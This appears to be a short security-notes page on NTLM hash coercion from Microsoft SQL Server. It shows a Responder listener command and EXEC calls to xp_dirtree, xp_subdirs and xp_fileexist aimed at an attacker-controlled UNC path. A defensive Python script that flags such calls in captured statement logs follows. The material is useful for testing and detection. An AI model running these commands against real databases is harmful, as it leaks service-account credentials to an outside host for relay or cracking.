Operator On The Wire

UNC Path NTLM Coercion

  • xp_fileexist: Checks whether a certain file exists
  • xp_dirtree: Returns a directory tree based on a provided directory
  • xp_subdirs: Returns a list of sub-directories of a provided directory

Exploit

  1. Start Responder (any SMB server/handler works too)

     sudo responder -I tun0 -v

  2. Coerce

     EXEC xp_dirtree '\\<IP>\a';
     EXEC xp_subdirs '\\<IP>\a';
     EXEC xp_fileexist '\\<IP>\a';
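
Detection

The calls above leave a recognisable trace in captured SQL statement text: one of the three procedures invoked with a UNC path instead of a local one. The following is an added example, not code from the original page: it scans (login, statement) records for those calls and reports every remote host that is not on an allowlist. The record format, the logins, the host names and the allowlist are constructed assumptions.

```python
import re

# The three extended procedures listed on this page.
PROCS = ("xp_dirtree", "xp_subdirs", "xp_fileexist")

# Procedure name (any schema prefix or [brackets] before it is ignored),
# followed by a quoted first argument, optionally written as N'...'.
CALL_RE = re.compile(
    r"(?<![\w@])(?P<proc>" + "|".join(PROCS) + r")\]?\s*\(?\s*"
    r"N?(?P<q>['\"])(?P<path>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)
# A UNC path starts with two slashes; the first component is the remote host.
UNC_RE = re.compile(r"^[\\/]{2}(?P<host>[^\\/]+)")

# Constructed allowlist: file servers the instance legitimately reads from.
ALLOWED_HOSTS = frozenset({"fs01.corp.example"})

# Constructed sample records: (login, statement text).
SAMPLE_STATEMENTS = [
    ("app_reader", r"EXEC xp_dirtree '\\192.0.2.50\a';"),
    ("app_reader", r"exec master..xp_fileexist N'\\198.51.100.9\a'"),
    ("backup_svc", r"EXEC master.dbo.xp_subdirs '\\fs01.corp.example\sqlbackups'"),
    ("backup_svc", r"EXEC xp_fileexist 'D:\Backups\full.bak'"),
    ("dba", r"EXECUTE [master]..[xp_subdirs] '\\203.0.113.7\a'"),
]

def find_unc_coercion(statement, allowed_hosts=frozenset()):
    """Return (procedure, host) for each call whose path is a UNC path
    pointing at a host outside allowed_hosts."""
    findings = []
    for m in CALL_RE.finditer(statement):
        unc = UNC_RE.match(m.group("path").strip())
        if not unc:
            continue  # local path: no outbound SMB authentication
        host = unc.group("host").lower()
        if host not in allowed_hosts:
            findings.append((m.group("proc").lower(), host))
    return findings

def scan(records, allowed_hosts):
    """Return (login, procedure, host) for every flagged call in records."""
    return [(login, proc, host)
            for login, stmt in records
            for proc, host in find_unc_coercion(stmt, allowed_hosts)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_STATEMENTS, ALLOWED_HOSTS):
        print("ALERT login=%s proc=%s remote_host=%s" % hit)
```

Calls that pass the path in a variable are not resolved by this static check; pair it with an egress rule or alert on outbound SMB from the database host.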